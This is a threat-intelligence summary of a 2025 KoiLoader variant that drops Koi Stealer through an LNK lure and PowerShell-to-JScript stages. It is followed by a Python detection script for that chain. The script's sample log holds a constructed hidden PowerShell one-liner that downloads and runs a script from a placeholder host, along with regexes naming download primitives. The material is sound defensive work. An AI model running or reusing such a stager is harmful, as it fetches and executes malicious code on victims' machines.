KoiLoader Reloaded: New Variant Uses LNK Abuse, Script Chains, and PowerShell to Deliver Stealer Payload


eSentire’s Threat Response Unit (TRU) has uncovered a sophisticated intrusion attempt involving a new variant of the KoiLoader malware, which delivers Koi Stealer through a multi-stage attack. The intrusion starts with a phishing email carrying a malicious .lnk file disguised as a document. When the shortcut is opened, it runs PowerShell commands that download malicious JScript files, which in turn establish persistence, evade detection, and initiate payload delivery. The malware uses anti-analysis techniques to avoid detection, including checks for specific system languages, VM artifacts, and sandbox environments.

The final payload, Koi Stealer, is designed to exfiltrate sensitive data such as passwords, system credentials, cookies, and browser data. The malware uses a custom C2 protocol with encrypted communication to execute commands, download payloads, and perform system manipulations. This 2025 variant demonstrates advanced evasion techniques, including UAC bypasses and persistence mechanisms.
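The delivery chain summarized above (a shortcut opened from the desktop, PowerShell downloading a script, then a Windows script host running JScript from a user-writable path) is visible in ordinary process-creation telemetry. The following detection example is added here and is not eSentire's code or part of the toolkit the article mentions; the pipe-delimited log format, the field layout, the `example.invalid` URL and every sample record are constructed for illustration and are not real indicators from the intrusion.

```python
"""
Added detection example (not eSentire's code): flag the process-creation
pattern described in the summary (LNK lure -> PowerShell download -> JScript
via wscript.exe) over constructed Sysmon-style records.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    parent: str   # parent image basename, lowercased
    image: str    # image basename, lowercased
    cmdline: str


# Constructed sample records in "ts|parent|image|cmdline" form (not real telemetry).
SAMPLE_LOG = """\
2025-03-01T10:00:01|explorer.exe|winword.exe|"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" invoice.docx
2025-03-01T10:02:10|explorer.exe|powershell.exe|powershell.exe -w hidden -nop -c "iwr http://example.invalid/a.js -OutFile $env:TEMP\\a.js; wscript $env:TEMP\\a.js"
2025-03-01T10:02:11|powershell.exe|wscript.exe|wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\a.js
2025-03-01T10:05:00|services.exe|powershell.exe|powershell.exe -File C:\\Scripts\\backup.ps1
"""

# PowerShell download primitives commonly seen in one-line stagers.
DOWNLOAD_RE = re.compile(
    r"(iwr|invoke-webrequest|downloadfile|downloadstring|net\.webclient|start-bitstransfer)",
    re.I,
)
# Flags that hide the console or suppress profile/logging defaults.
HIDDEN_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc\b|-encodedcommand)", re.I
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Script files executed from user-writable locations.
USER_PATH_RE = re.compile(
    r"(\\temp\\|\\appdata\\|\\downloads\\|\\public\\).*\.(js|jse|vbs)\b", re.I
)


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the constructed pipe-delimited format into ProcEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(ts, parent.lower(), image.lower(), cmdline))
    return events


def detect(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Return (timestamp, reason) tuples for events matching the chain."""
    hits = []
    for e in events:
        # Stage 1: PowerShell launched by the user's shell (how an opened .lnk
        # appears) with a download primitive or console-hiding flags.
        if e.image in POWERSHELL and e.parent == "explorer.exe":
            if DOWNLOAD_RE.search(e.cmdline) or HIDDEN_RE.search(e.cmdline):
                hits.append((e.ts, "explorer-spawned PowerShell with download/hidden flags (LNK-style lure)"))
        # Stage 2: a script host, spawned by PowerShell, running a script from
        # a user-writable directory.
        if e.image in SCRIPT_HOSTS and e.parent in POWERSHELL and USER_PATH_RE.search(e.cmdline):
            hits.append((e.ts, "script host running JScript/VBS from user-writable path, spawned by PowerShell"))
    return hits


if __name__ == "__main__":
    for ts, reason in detect(parse_log(SAMPLE_LOG)):
        print(ts, reason)
```

On the constructed sample, the two lines at 10:02 are flagged and the administrative `backup.ps1` run under `services.exe` is not; in production the same two rules map onto Sysmon Event ID 1 or EDR process-creation events, and the parent-process condition is what keeps the PowerShell rule from firing on scheduled or service-driven scripts.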

eSentire has provided a Python-based emulation toolkit for researchers to study the malware’s behavior.
